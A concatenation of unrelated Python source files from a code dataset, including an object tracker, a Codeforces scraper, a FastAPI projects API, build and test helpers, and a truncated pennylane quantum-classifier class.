# Assignments within the top left corner corresponding to existing tracks and detections
# are designated as (valid) assignments
assignments = assignments_all[(assignments_all < [m, n]).all(axis=1)]
# Assignments within the top right corner corresponding to existing tracks matched with dummy detections
# are designated as unassigned tracks and will later be regarded as invisible
unassigned_tracks = assignments_all[
(assignments_all >= [0, n]).all(axis=1) & (assignments_all < [m, k + l]).all(axis=1)]
# Assignments within the bottom left corner corresponding to detections matched to dummy tracks
# are designated as unassigned detections and will generate a new track
unassigned_detections = assignments_all[
(assignments_all >= [m, 0]).all(axis=1) & (assignments_all < [k + l, n]).all(axis=1)]
# sorting_time = time.time()
# print(f"Initialization took {initialization_time - start_time}ms.\n"
# f"Distance measuring took {distance_time - initialization_time}ms.\n"
# f"Padding took {padding_time - distance_time}ms.\n"
# f"Assignment took {assignment_time - padding_time}ms.\n"
# f"Sorting took {sorting_time - assignment_time}\n\n")
return assignments, unassigned_tracks, unassigned_detections
# Using the coordinates of valid assignments which correspond to the detection and track indices,
# update the track with the matched detection
def update_assigned_tracks(assignments, tracks, centroids, sizes):
for assignment in assignments:
track_idx = assignment[0]
detection_idx = assignment[1]
centroid = centroids[detection_idx]
size = sizes[detection_idx]
track = tracks[track_idx]
kf = track.kalmanFilter
kf.update(centroid)
# # Adaptive filtering
# # If the residual is too large, increase the process noise
# Q_scale_factor = 100.
# y, S = kf.y, kf.S # Residual and Measurement covariance
# # Square and normalize the residual
# eps = np.dot(y.T, np.linalg.inv(S)).dot(y)
# kf.Q *= eps * 10.
track.size = size
track.age += 1
track.totalVisibleCount += 1
track.consecutiveInvisibleCount = 0
# Existing tracks without a matching detection are aged and considered invisible for the frame
def update_unassigned_tracks(unassigned_tracks, tracks):
for unassignedTrack in unassigned_tracks:
track_idx = unassignedTrack[0]
track = tracks[track_idx]
track.age += 1
track.consecutiveInvisibleCount += 1
# If any track has been invisible for too long, or generated by a flash, it will be removed from the list of tracks
def delete_lost_tracks(tracks):
if len(tracks) == 0:
return tracks
invisible_for_too_long = 3 * FPS
age_threshold = 1 * FPS
tracks_to_be_removed = []
for track in tracks:
visibility = track.totalVisibleCount / track.age
# A new created track with a low visibility is likely to have been generated by noise and is to be removed
# Tracks that have not been seen for too long (The threshold determined by the reliability of the filter)
# cannot be accurately located and are also be removed
if (track.age < age_threshold and visibility < 0.8) \
or track.consecutiveInvisibleCount >= invisible_for_too_long:
tracks_to_be_removed.append(track)
tracks = [track for track in tracks if track not in tracks_to_be_removed]
return tracks
# Detections not assigned an existing track are given their own track, initialized with the location of the detection
def create_new_tracks(unassigned_detections, next_id, tracks, centroids, sizes):
for unassignedDetection in unassigned_detections:
detection_idx = unassignedDetection[1]
centroid = centroids[detection_idx]
size = sizes[detection_idx]
dt = 1 / FPS # Time step between measurements in seconds
track = Track(next_id, size)
# Attempted tuning
# # Constant velocity model
# # Initial Location
# track.kalmanFilter.x = [centroid[0], centroid[1], 0, 0]
# # State Transition Matrix
# track.kalmanFilter.F = np.array([[1., 0, dt, 0],
# [0, 1, 0, dt],
# [0, 0, 1, 0],
# [0, 0, 0, 1]])
# # Measurement Function
# track.kalmanFilter.H = np.array([[1., 0, 0, 0],
# [0, 1, 0, 0]])
# # Covariance Matrix
# track.kalmanFilter.P = np.diag([(10.*SCALE_FACTOR)**2, (10.*SCALE_FACTOR)**2, # Positional variance
# (7*SCALE_FACTOR)**2, (7*SCALE_FACTOR)**2]) # Velocity variance
# # Process Noise
# # Assumes that the process noise is white
# track.kalmanFilter.Q = Q_discrete_white_noise(dim=4, dt=dt, var=1000)
# # Measurement Noise
# track.kalmanFilter.R = np.diag([10.**2, 10**2])
# Constant velocity model
# Initial Location
track.kalmanFilter.x = [centroid[0], centroid[1], 0, 0]
# State Transition Matrix
track.kalmanFilter.F = np.array([[1., 0, 1, 0],
[0, 1, 0, 1],
[0, 0, 1, 0],
[0, 0, 0, 1]])
# Measurement Function
track.kalmanFilter.H = np.array([[1., 0, 0, 0],
[0, 1, 0, 0]])
# Ah I really don't know what I'm doing here
# Covariance Matrix
track.kalmanFilter.P = np.diag([200., 200, 50, 50])
# Motion Noise
track.kalmanFilter.Q = np.diag([100., 100, 25, 25])
# Measurement Noise
track.kalmanFilter.R = 100
# # Constant acceleration model
tracks.append(track)
next_id += 1
return next_id
def filter_tracks(frame, masked, tracks, counter, origin):
# Minimum number of frames to remove noise seems to be somewhere in the range of 30
# Actually, I feel having both might be redundant together with the deletion criteria
min_track_age = max(1.0 * FPS, 30) # seconds * FPS to give number of frames in seconds
# This has to be less than or equal to the minimum age or it make the minimum age redundant
min_visible_count = max(1.0 * FPS, 30)
good_tracks = []
if len(tracks) != 0:
for track in tracks:
if track.age > min_track_age and track.totalVisibleCount > min_visible_count:
centroid = track.kalmanFilter.x[:2]
size = track.size
good_tracks.append([track.id, track.age, size, (centroid[0], centroid[1])])
centroid = track.kalmanFilter.x[:2] - origin
# Display filtered tracks
rect_top_left = (int(centroid[0] - size[0] / 2), int(centroid[1] - size[1] / 2))
rect_bottom_right = (int(centroid[0] + size[0] / 2), int(centroid[1] + size[1] / 2))
colour = (0, 255, 0) if track.consecutiveInvisibleCount == 0 else (0, 0, 255)
thickness = 1
cv2.rectangle(frame, rect_top_left, rect_bottom_right, colour, thickness)
cv2.rectangle(masked, rect_top_left, rect_bottom_right, colour, thickness)
font = cv2.FONT_HERSHEY_SIMPLEX
font_scale = 0.5
cv2.putText(frame, str(track.id), (rect_bottom_right[0], rect_top_left[1]),
font, font_scale, colour, thickness, cv2.LINE_AA)
cv2.putText(masked, str(track.id), (rect_bottom_right[0], rect_top_left[1]),
font, font_scale, colour, thickness, cv2.LINE_AA)
return good_tracks
| StarcoderdataPython |
186967 | <reponame>sarthakeddy/Codeforces-Profile-Viewer
import requests
import json
import xlsxwriter
c=0
while True:
if c==0:
cf_id=input("Enter your codeforces id : ")
c+=1
else:
cf_id=input("Enter your codeforces id again\n")
link='https://www.codeforces.com/profile/'+cf_id
check=requests.get(link)
display="INVALID Codeforces ID"
if check.url == "https://codeforces.com/":
print(display.center(40,'*'))
else:
break
link="https://codeforces.com/api/user.rating?handle="+cf_id
js_object=requests.get(link)
py_dict=json.loads(js_object.text)
#loading new workbook
wb = xlsxwriter.Workbook(cf_id+'.xlsx')
sheet = wb.add_worksheet()
#result from api
p=py_dict['result']
#initialising heading
sheet.write('A1',"S No.")
sheet.write('B1',"Contest ID")
sheet.write('C1',"Contest Name")
sheet.write('D1',"Rank")
sheet.write('E1',"Old Rating")
sheet.write('F1',"New Rating")
sheet.write('G1',"Change in Rating")
#traverse to display recent submissions
i=0
for temp in p:
sheet.write('A'+str(i+3),i+1)
sheet.write('B'+str(i+3),p[i]['contestId'])
sheet.write('C'+str(i+3),p[i]['contestName'])
sheet.write('D'+str(i+3),p[i]['rank'])
sheet.write('E'+str(i+3),p[i]['oldRating'])
sheet.write('F'+str(i+3),p[i]['newRating'])
sheet.write('G'+str(i+3),p[i]['newRating']-p[i]['oldRating'])
i+=1;
wb.close() | StarcoderdataPython |
4955635 | # AST tree
class Node:
def __init__(self, value):
self.value = value
self.children = []
tree = Node('A')
tree.children.append(Node('B'))
tree.children.append(Node('C'))
def print_node_value(value):
print(value)
def visit(node, handle_node):
handle_node(node.value)
for child in node.children:
visit(child, handle_node)
# tree is from the previous example.
visit(tree, print_node_value) | StarcoderdataPython |
9672375 | #!/usr/bin/python3
# encoding: utf-8
# WARNING! Do not edit! http://waf.googlecode.com/git/docs/wafbook/single.html#_obtaining_the_waf_file
import os,sys,re
from waflib import Options,TaskGen,Task,Utils
from waflib.TaskGen import feature,after_method
@feature('msgfmt')
def apply_msgfmt(self):
for lang in self.to_list(self.langs):
node=self.path.find_resource(lang+'.po')
task=self.create_task('msgfmt',node,node.change_ext('.mo'))
langname=lang.split('/')
langname=langname[-1]
inst=getattr(self,'install_path','${KDE4_LOCALE_INSTALL_DIR}')
self.bld.install_as(inst+os.sep+langname+os.sep+'LC_MESSAGES'+os.sep+getattr(self,'appname','set_your_appname')+'.mo',task.outputs[0],chmod=getattr(self,'chmod',Utils.O644))
class msgfmt(Task.Task):
color='BLUE'
run_str='${MSGFMT} ${SRC} -o ${TGT}'
def configure(self):
kdeconfig=self.find_program('kde4-config')
prefix=self.cmd_and_log('%s --prefix'%kdeconfig).strip()
fname='%s/share/apps/cmake/modules/KDELibsDependencies.cmake'%prefix
try:os.stat(fname)
except OSError:
fname='%s/share/kde4/apps/cmake/modules/KDELibsDependencies.cmake'%prefix
try:os.stat(fname)
except OSError:self.fatal('could not open %s'%fname)
try:
txt=Utils.readf(fname)
except(OSError,IOError):
self.fatal('could not read %s'%fname)
txt=txt.replace('\\\n','\n')
fu=re.compile('#(.*)\n')
txt=fu.sub('',txt)
setregexp=re.compile('([sS][eE][tT]\s*\()\s*([^\s]+)\s+\"([^"]+)\"\)')
found=setregexp.findall(txt)
for(_,key,val)in found:
self.env[key]=val
self.env['LIB_KDECORE']=['kdecore']
self.env['LIB_KDEUI']=['kdeui']
self.env['LIB_KIO']=['kio']
self.env['LIB_KHTML']=['khtml']
self.env['LIB_KPARTS']=['kparts']
self.env['LIBPATH_KDECORE']=[os.path.join(self.env.KDE4_LIB_INSTALL_DIR,'kde4','devel'),self.env.KDE4_LIB_INSTALL_DIR]
self.env['INCLUDES_KDECORE']=[self.env['KDE4_INCLUDE_INSTALL_DIR']]
self.env.append_value('INCLUDES_KDECORE',[self.env['KDE4_INCLUDE_INSTALL_DIR']+os.sep+'KDE'])
self.find_program('msgfmt',var='MSGFMT')
| StarcoderdataPython |
11347539 | <reponame>jianershi/algorithm<gh_stars>1-10
"""
442. Implement Trie (Prefix Tree)
https://www.lintcode.com/problem/implement-trie-prefix-tree/description
answer modified based on 令狐冲's answer
https://www.jiuzhang.com/solution/implement-trie-prefix-tree/
"""
class TrieNode:
def __init__(self):
self.children = {}
self.is_word = False
class Trie:
def __init__(self):
# do intialization if necessary
self.root = TrieNode()
"""
@param: word: a word
@return: nothing
"""
def insert(self, word):
# write your code here
node = self.root
for c in word:
node.children[c] = node.children.get(c, TrieNode())
node = node.children[c]
node.is_word = True
"""
@param: word: A string
@return: if the word is in the trie.
"""
def search(self, word):
# write your code here
node = self.find(word)
return node is not None and node.is_word
def find(self, word):
node = self.root
for c in word:
if c not in node.children:
return None
node = node.children[c]
return node
"""
@param: prefix: A string
@return: if there is any word in the trie that starts with the given prefix.
"""
def startsWith(self, prefix):
# write your code here
node = self.root
for c in prefix:
if c not in node.children:
return False
node = node.children[c]
return True
| StarcoderdataPython |
3475729 | import json
import pathlib
import typing
from functools import lru_cache
from fastapi import FastAPI, Request
from fastapi.openapi.utils import get_openapi
from starlette.exceptions import HTTPException as StarletteHTTPException
from starlette.responses import PlainTextResponse, Response
from . import __version__ as VERSION
from .schema import json_schema
from .utils import INFO, get_title_and_description, projects_to_csv
CHARSET = "utf-8"
app_dir = pathlib.Path(__file__).parent
class PrettyJSONResponse(Response):
""" A pretty JSON response class """
media_type = f"application/json; charset={CHARSET}"
def render(self, content: typing.Any) -> bytes:
return json.dumps(content, indent=2).encode(CHARSET)
def AppException(status_code=404):
""" A custom exception to point users to documentation url """
data = {"message": "Not Found", "documentation_url": "https://api.carbonplan.org/docs"}
return PrettyJSONResponse(data, status_code=status_code)
def get_data(kind):
""" load the projects dataset """
if kind == "projects":
with open(app_dir / "data" / "projects.json", "r") as f:
return json.load(f)
else:
raise NotImplementedError(kind)
# create FAST APP App
app = FastAPI(default_response_class=PrettyJSONResponse)
@app.exception_handler(StarletteHTTPException)
async def http_exception_handler(request, exc):
""" Custom exception handler """
return AppException(status_code=exc.status_code)
@app.middleware("http")
async def add_custom_header(request: Request, call_next):
""" inject a few custom headers into app """
response = await call_next(request)
response.headers["Cache-Control"] = "no-cache"
response.headers["x-carbonplan-media-type"] = f"carbonplan.{VERSION}; format=json"
return response
@app.get("/")
@app.get(f"/{VERSION}/", include_in_schema=False)
@lru_cache(maxsize=32)
def root():
""" base endpoint for API """
return {
"docs_url": "https://api.carbonplan.org/docs",
"schema_url": "https://api.carbonplan.org/schema.json",
"projects_url": "https://api.carbonplan.org/projects.json",
}
@app.get("/projects.json")
@app.get(f"/{VERSION}/projects.json", include_in_schema=False)
@lru_cache(maxsize=32)
def projects(id: str = None):
""" return a `ProjectCollection` if `id` is None, otherwise return a `Project`"""
data = get_data("projects")
out = {}
if id is None:
out = data
for p in data["projects"]:
if p["id"] == id:
out = p
break
return out
@app.get("/projects.csv")
@app.get(f"/{VERSION}/projects.csv", include_in_schema=False)
@lru_cache(maxsize=32)
def projects_csv(id: str = None):
""" return a `ProjectCollection` if `id` is None, otherwise return a `Project`"""
data = get_data("projects")
csv = projects_to_csv(data["projects"], id)
return PlainTextResponse(csv, media_type="text/csv")
@app.get("/schema.json")
@app.get(f"/{VERSION}/schema.json", include_in_schema=False)
@lru_cache(maxsize=32)
def schema(obj: str = None):
""" return a the list of objects defined in the schema """
return {"objects": list(json_schema.objects.keys())}
@app.get("/schema/{obj}.json")
@app.get(f"/{VERSION}/schema/{{obj}}.json", include_in_schema=False)
@lru_cache(maxsize=32)
def schema_object(obj: str):
"""Return the schema for `obj`"""
try:
return json_schema.get(obj)
except KeyError:
return AppException()
def custom_openapi():
"""function to set custom OpenAPI schema"""
if app.openapi_schema:
return app.openapi_schema
title, description = get_title_and_description()
openapi_schema = get_openapi(
title=title,
version=VERSION,
description=description,
routes=app.routes,
)
openapi_schema["info"].update(INFO)
app.openapi_schema = openapi_schema
return app.openapi_schema
# set custom openapi schema
app.openapi = custom_openapi
| StarcoderdataPython |
1832056 | <gh_stars>1-10
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from builtins import zip
from builtins import range
from builtins import object
import numpy as np
from . import crystal
def bijk_to_coord(prim,bijk,sd=(True,True,True)):
"""Convert the bijk index into an atomic coordinate,
given the primitive structure
Parameters
----------
prim : Crystal
bijk : (int,int,int,int)
Returns
-------
SelectiveAtomCoord
"""
cart=np.dot(prim.lattice().column_lattice(),bijk[1::])+prim.cart()[bijk[0]]
name=prim.basis()[0].name()
return crystal.SelectiveAtomCoord(cart[0],cart[1],cart[2],name,sd)
def stamp_site(jumbo,site,tol):
"""
Find the closest matching site in the superstructure, if the dot
product between the distance is within the tolerance, replace
the site with the new one.
Parameters
----------
jumbo : Crystal
site : SelectiveAtomCoord
tol : float
Returns
-------
Crystal
"""
ix=crystal.argsort_periodic_coord_match(jumbo.basis(),[site],jumbo.lattice())[0]
dot=crystal.shortest_periodic_coord_distance(site,jumbo.basis()[ix],jumbo.lattice())
if dot>tol:
raise ValueError("You're coordinates don't match. What do.")
jumbo._basis[ix]=site
return jumbo
def stamp_bijk(jumbo,prim,bijk,name,trans=(0,0,0),tol=0.00001):
"""
Find the closest matching site in the superstructure, if the dot
product between the distance is within the tolerance, replace
the site with the new one. The site is specified in terms of
primitive vectors.
Parameters
----------
jumbo : Crystal
prim : Crystal
bijk : [int,int,int,int]
names : str
tol : float, optional
Returns
-------
Crystal
"""
bijk=[i for i in bijk]
bijk[1]+=trans[0]
bijk[2]+=trans[1]
bijk[3]+=trans[2]
stamp=bijk_to_coord(prim,bijk)
stamp._name=name
stamp_site(jumbo,stamp,0.00001)
return jumbo
| StarcoderdataPython |
107626 | <gh_stars>0
#!/usr/bin/env python
"""rundevel.py -- script to run current code
Usage: [interpreter] rundevel.py [run|rebot] [options] [arguments]
Examples:
./rundevel.py --name Example tests.txt # run with python
./rundevel.py run --name Example tests.txt # same as above
jython rundevel.py --name Example tests.txt # run with jython
./rundevel.py rebot --name Example out.xml # rebot with python
ipy rundevel.py rebot --name Example out.xml # rebot with ipy
"""
from os.path import abspath, dirname, exists, join
import os
import sys
if len(sys.argv) == 1:
sys.exit(__doc__)
curdir = dirname(abspath(__file__))
src = join(curdir, 'src')
tmp = join(curdir, 'tmp')
tmp2 = join(tmp, 'rundevel')
if not exists(tmp):
os.mkdir(tmp)
if not exists(tmp2):
os.mkdir(tmp2)
os.environ['ROBOT_SYSLOG_FILE'] = join(tmp, 'syslog.txt')
os.environ['ROBOT_INTERNAL_TRACES'] = 'yes'
os.environ['TEMPDIR'] = tmp2 # Used by tests under atest/testdata
if 'PYTHONPATH' not in os.environ: # Allow executed scripts to import robot
os.environ['PYTHONPATH'] = src
else:
os.environ['PYTHONPATH'] = os.pathsep.join([src, os.environ['PYTHONPATH']])
sys.path.insert(0, src)
from robot import run_cli, rebot_cli
if sys.argv[1] == 'rebot':
runner = rebot_cli
args = sys.argv[2:]
else:
runner = run_cli
args = ['--pythonpath', join(curdir, 'atest', 'testresources', 'testlibs'),
'--pythonpath', tmp,
'--loglevel', 'DEBUG']
args += sys.argv[2:] if sys.argv[1] == 'run' else sys.argv[1:]
runner(['--outputdir', tmp] + args)
| StarcoderdataPython |
4924113 | import json
from pathlib import Path
import pandas as pd
def spi_hierarchy():
'data/spi2019.xlsx の最後のシートに記載されているSPI指標の定義から階層構造を構成する'
def rec(defs, keys):
indices = list(defs.keys())[:3]
dimensions = dict()
for _, row in defs.iterrows():
if pd.notna(row).all():
dimension, component, name = row['Dimension'], row['Component'], row['Indicator name']
if not dimension in dimensions: dimensions[dimension] = dict()
components = dimensions[dimension]
if not component in components: components[component] = []
components[component].append(name)
return dimensions
return rec(pd.read_excel(str(Path(__file__).parent.parent / 'data' / 'spi2019.xlsx'),
sheet_name='Definitions', skiprows=[0]),
'Region Name, Sub-region Name, Intermediate Region Name, Country or Area'.split(', '))
######################################################################
# Bokeh section
from bokeh.models import RadioButtonGroup
from bokeh.layouts import column
class IndexMenus():
'階層化メニューの階層の沿った階層化メニュー'
tree = spi_hierarchy() # SPI指標の階層を表す木構造
def __init__(self, doc):
'''
Attributes
----------
view: Column
階層化メニューウィジェット
path: list of str
階層化メニューの値から選択された項目のリスト
'''
def set_callback(choice, level):
'''
level番目のメニューchoiceの要素が選択されたとき(active)の挙動(on_change)を設定
Parameters
----------
choice :
メニュー
level :
メニュー階層のレベル (0-index)
Notes
-----
set_callback に choice, level を与えることで、これらを含む関数閉包を構成していることに注意
'''
def on_change(attr, old, new):
if new is None: return # This is the case when the active field of a widget is updated within the "update" method
self.path = self.path[:level] + [choice.labels[new]]
self._update()
choice.on_change('active', on_change)
def button_group(level):
choice = RadioButtonGroup(labels=['None'], visible=False, active=None)
set_callback(choice, level)
return choice
self.view = column(name='index_menus',
children=[button_group(level) for level in range(3)],
css_classes=['spix', 'spix-spi-view'],
sizing_mode='scale_width')
self.path = []
self._update()
doc.add_root(self.view)
def _update(self):
print(' > '.join(self.path)) # 選択状態を表示する
menu = self.view.children
for level, choice in enumerate(menu):
choice.visible = level <= len(self.path)
menu[len(self.path)].active = None
# 階層的な選択に沿って階層化メニューのラベルを更新
t = self.tree
menu[0].labels = sorted(t.keys())
for active, choice in zip(self.path, menu[1:]):
t = t[active] # 階層構造から選択 (path) に沿って探索
if type(t) == dict: # 地域群の場合
choice.labels = sorted(t.keys())
else: # 国と地域の場合は、それらを列挙表示する
choice.visible = False
for index in t: print(f' - {index}')
| StarcoderdataPython |
3542748 | <gh_stars>1-10
def florida_getEnhancedLocation(location):
return add_state(location, "Florida") | StarcoderdataPython |
8124601 | class Circulo:
def calcular_area(self, pi, raio):
return pi*raio*raio
def calcular_perimetro(self, pi, raio):
return 2*pi*raio
circulo = Circulo()
print(circulo.calcular_area(3.14, 10))
print(circulo.calcular_perimetro(3.14, 10)) | StarcoderdataPython |
136140 | <reponame>yanshengjia/algorithm<gh_stars>10-100
"""
Given an unsorted array of integers, find the length of the longest consecutive elements sequence.
Your algorithm should run in O(n) complexity.
Example:
Input: [100, 4, 200, 1, 3, 2]
Output: 4
Explanation: The longest consecutive elements sequence is [1, 2, 3, 4]. Therefore its length is 4.
Solution:
1. Sort
2. Hashset
"""
# Sort
# TLE: while loop too slow
# Time: O(NlogN)
# Space: O(1)
class Solution(object):
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
l = len(nums)
if l == 0:
return 0
nums.sort()
max_len = 0
for i in range(l):
cur_len = 1
j = i + 1
while j < l:
if nums[j] == nums[j-1] + 1:
cur_len += 1
j += 1
elif nums[j] == nums[j-1]:
j += 1
else:
break
if cur_len > max_len:
max_len = cur_len
i = j
return max_len
# Sort
# Time: O(NlogN)
# Space: O(1)
class Solution(object):
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
l = len(nums)
if l == 0:
return 0
nums.sort()
max_len = 0
cur_len = 1
for i in range(1, l):
if nums[i] != nums[i-1]:
# jump duplicates
if nums[i] == nums[i-1] + 1:
cur_len += 1
else:
max_len = max(max_len, cur_len)
cur_len = 1
# in case of the last number is in the longest consecutive numbers
max_len = max(max_len, cur_len)
return max_len
# Sort
# Time: O(NlogN)
# Space: O(1)
class Solution(object):
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
l = len(nums)
if l < 2 :
return l
res = 0
cur_len = 1
nums = list(set(nums))
nums.sort()
for i in range(1, len(nums)) :
if nums[i] == nums[i-1]+1 :
cur_len += 1
else:
res = max(res, cur_len)
cur_len = 1
res = max(res, cur_len)
return res
# Set
# Time: O(N), since we visit each number once
# Space: O(1)
class Solution(object):
def longestConsecutive(self, nums):
"""
:type nums: List[int]
:rtype: int
"""
# for each num I will check whether num-1 exists
# if yes, then I ignore this num
# Otherwise if num-1 doesn't exist, then I will go till I can find num+1
# so in a way I am only checking each number max once and once in set.
s = set(nums)
res = 0
for num in s:
cur_len = 1
if num - 1 not in s:
while num + 1 in s:
cur_len += 1
num += 1
res = max(res, cur_len)
return res | StarcoderdataPython |
5173800 | <gh_stars>0
import socket
s= socket.socket()
# connect to the host
print("Socket Name: " ,socket.gethostname())
s.connect((socket.gethostname(),12346))
print("Connection created : ",s.recv(512))
while True:
data = s.recv(512)
print('data long is ',len(data))
print(data.decode(),end='\n')
if (len(data) < 1):
break
s.close()
| StarcoderdataPython |
6691611 | <reponame>langgithub/LangSpider
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author:yuanlang
# creat_time: 2020/7/16 上午10:34
# file: utils.py
import hashlib
import click
def get_redis_task_key_name(site_type, crawl_type):
return '{}_{}_tasks'.format(site_type, crawl_type)
def get_headers_from_text(text):
headers = {}
for line in text.split('\n'):
line = line.strip()
if line:
try:
key = line.split(':')[0].strip()
value = line[len(key)+1:].strip()
headers[key] = value
except Exception as e:
pass
return headers
def get_cookies_from_text(text):
cookies={}#初始化cookies字典变量
for line in text.split(';'): #按照字符:进行划分读取
#其设置为1就会把字符串拆分成2份
name,value=line.strip().split('=',1)
cookies[name]=value #为字典cookies添加内容
return cookies
def echo_help():
ctx = click.get_current_context()
click.echo(ctx.get_help())
ctx.exit()
# md5加密
def md5(src):
if isinstance(src, str):
src = src.encode('utf-8')
m = hashlib.md5()
m.update(src)
return m.hexdigest()
def run():
pass
if __name__ == '__main__':
run()
| StarcoderdataPython |
160701 | <reponame>Mopolino8/pylbm
# Authors:
# <NAME> <<EMAIL>>
# <NAME> <<EMAIL>>
#
# License: BSD 3 clause
"""
Example of a two velocities scheme for the shallow water system
d_t(h) + d_x(q) = 0, t > 0, 0 < x < 1,
d_t(q) + d_x(q^2/h+gh^2/2) = 0, t > 0, 0 < x < 1,
"""
import sympy as sp
import pylbm
# pylint: disable=invalid-name
H, Q, X = sp.symbols('h, q, X')
LA, G = sp.symbols('lambda, g', constants=True)
SIGMA_H, SIGMA_Q = sp.symbols('sigma_1, sigma_2', constants=True)
scheme_cfg = {
'dim': 1,
'scheme_velocity': LA,
'schemes': [
{
'velocities': [1, 2],
'conserved_moments': H,
'polynomials': [1, X],
'relaxation_parameters': [0, 1/(.5+SIGMA_H)],
'equilibrium': [H, Q],
},
{
'velocities': [1, 2],
'conserved_moments': Q,
'polynomials': [1, X],
'relaxation_parameters': [0, 1/(.5+SIGMA_Q)],
'equilibrium': [Q, Q**2/H+.5*G*H**2],
},
],
'parameters': {
LA: 1.,
G: 9.81,
SIGMA_H: 1/1.8-.5,
SIGMA_Q: 1/1.2-.5,
},
}
scheme = pylbm.Scheme(scheme_cfg)
eq_pde = pylbm.EquivalentEquation(scheme)
print(eq_pde)
| StarcoderdataPython |
6596093 | t=int(input())
while(t>0):
l=[]
l1=[]
j=[]
j1=[]
t=t-1
d=int(input())
while(d>0):
d=d-1
day,p=map(int,input().split())
l.append(day)
j.append(p)
q=int(input())
while(q>0):
l2=l.copy()
j2=j.copy()
q=q-1
dead,req=map(int,input().split())
i=-1
if(dead<l2[0]):
print('Go Sleep')
elif(dead>=l2[-1] and sum(j2)>=req):
print('Go Camp')
elif(dead>=l2[-1] and sum(j2)<req):
print('Go Sleep')
else:
while(dead>=l2[i+1] and i<len(j2)-2):
i=i+1
if(i==0 and req<=j2[0]):
i=1
dead=l2[i]
#print(dead,sum(j[0:i+1]),req)
#print(j2)
if(sum(j2[0:i+1])>=req):
print('Go Camp')
else:
print('Go Sleep')
| StarcoderdataPython |
12855106 | <filename>server/tests/test_api.py
# @file
#
# FadZmaq Project
# Professional Computing. Semester 2 2019
#
# Copyright FadZmaq © 2019 All rights reserved.
# @author <NAME> <EMAIL>
# @author <NAME> <EMAIL>
import json
# Tests that the server is up at all.
def test_index(client):
response = client.get('/', follow_redirects=False)
assert response.status_code == 308
# Not implemented
def test_user_request(client):
response = client.get('/user/recs', follow_redirects=True)
assert response.status_code == 200
# Not implemented
def test_user_request_by_id(client):
response = client.get('/user/1234', follow_redirects=True)
assert response.status_code == 410
# Basic test the profile API
# To be expanded when we receive data from DB -Jordan
def test_profile(client):
# Check we get a response
response = client.get('/profile', follow_redirects=True)
assert response.status_code == 200
data = json.loads(response.data)
assert "profile" in data
profile = data["profile"]
assert "name" in profile
# assert "age" in profile
def test_profile_post(client):
# Note this currently fails since the posting to profile is *not* implemented with json.
# Do not change this test, profile should (and will soon) be json.
# post_data = dict(somedata=profile_data.my_profile)
# response = client.post('/profile', data=post_data, follow_redirects=True)
# assert response.status_code == 200
assert True is False
def test_matches(client):
response = client.get('/matches', follow_redirects=True)
assert response.status_code == 200
print(response)
def test_match_request_by_id(client):
response = client.get('/matches/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
assert response.status_code == 200
# Not implemented yet
def test_match_delete_by_id(client):
response = client.delete('/matches/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
assert response.status_code == 204
def test_match_thumb_down(client):
response = client.post('/matches/thumbs/down/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
assert response.status_code == 204
def test_match_thumb_up(client):
response = client.post('/matches/thumbs/up/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
assert response.status_code == 204
def test_like(client):
response = client.post('/like/b026324c6904b2a9cb4b88d6d61c81d1', follow_redirects=True)
assert response.status_code == 200
def test_pass(client):
response = client.post('/pass/<PASSWORD>', follow_redirects=True)
assert response.status_code == 200
| StarcoderdataPython |
6431711 | from __future__ import unicode_literals
import pytest
from aocd.models import User
@pytest.fixture(autouse=True)
def mocked_sleep(mocker):
no_sleep_till_brooklyn = mocker.patch("time.sleep")
return no_sleep_till_brooklyn
@pytest.fixture
def aocd_dir(tmp_path):
data_dir = tmp_path / ".config" / "aocd"
data_dir.mkdir(parents=True)
return data_dir
@pytest.fixture(autouse=True)
def remove_user_env(aocd_dir, monkeypatch):
monkeypatch.setattr("aocd.runner.AOCD_DIR", str(aocd_dir))
monkeypatch.setattr("aocd.models.AOCD_DIR", str(aocd_dir))
monkeypatch.setattr("aocd.cookies.AOCD_DIR", str(aocd_dir))
monkeypatch.delenv(str("AOC_SESSION"), raising=False)
@pytest.fixture(autouse=True)
def test_token(aocd_dir):
token_file = aocd_dir / "token"
cache_dir = aocd_dir / "testauth.testuser.000"
cache_dir.mkdir()
token_file.write_text("thetesttoken")
return token_file
@pytest.fixture(autouse=True)
def answer_not_cached(request, mocker):
install = True
rv = None
mark = request.node.get_closest_marker("answer_not_cached")
if mark:
install = mark.kwargs.get("install", True)
rv = mark.kwargs.get("rv", None)
if install:
mocker.patch("aocd.models.Puzzle._check_guess_against_existing", return_value=rv)
@pytest.fixture(autouse=True)
def detect_user_id(requests_mock):
requests_mock.get(
"https://adventofcode.com/settings",
text="<span>Link to testauth/testuser</span><code>000</code>",
)
yield
if getattr(User, "_token2id", None) is not None:
User._token2id = None
| StarcoderdataPython |
11330616 | <gh_stars>1-10
# VQC implemented in pennylane.
import os
import json
import pennylane as pnl
from pennylane import numpy as np
import autograd.numpy as anp
from pennylane.optimize import AdamOptimizer
import matplotlib.pyplot as plt
from . import feature_maps as fm
from . import variational_forms as vf
from .terminal_colors import tcols
class VQC:
def __init__(self, qdevice: pnl.device, hpars: dict):
"""
Variational quantum circuit, implemented using the pennylane python
package. This is a trainable quantum circuit. It is composed of a feature
map and a variational form, which are implemented in their eponymous
files in the same directory.
Args:
qdevice: String containing what kind of device to run the
quantum circuit on: simulation, or actual computer?
hpars: Dictionary of the hyperparameters to configure the vqc.
"""
self._hp = {
"hybrid": False,
"nqubits": 4,
"nfeatures": 16,
"fmap": "zzfm",
"vform": "two_local",
"vform_repeats": 4,
"optimiser": "adam",
"lr": 0.001,
"batch_size": 128,
"ae_model_path": "none"
}
self._hp.update((k, hpars[k]) for k in self._hp.keys() & hpars.keys())
self._qdevice = qdevice
self._layers = self._check_compat(self._hp["nqubits"], self._hp["nfeatures"])
self._nweights = vf.vforms_weights(
self._hp["vform"], self._hp["vform_repeats"], self._hp["nqubits"]
)
np.random.seed(123)
self._weights = 0.01 * np.random.randn(
self._layers, self._nweights, requires_grad=True
)
self._diff_method = self._select_diff_method(hpars)
self._optimiser = self._choose_optimiser(self._hp["optimiser"], self._hp["lr"])
self._class_loss_function = self._shift_bce
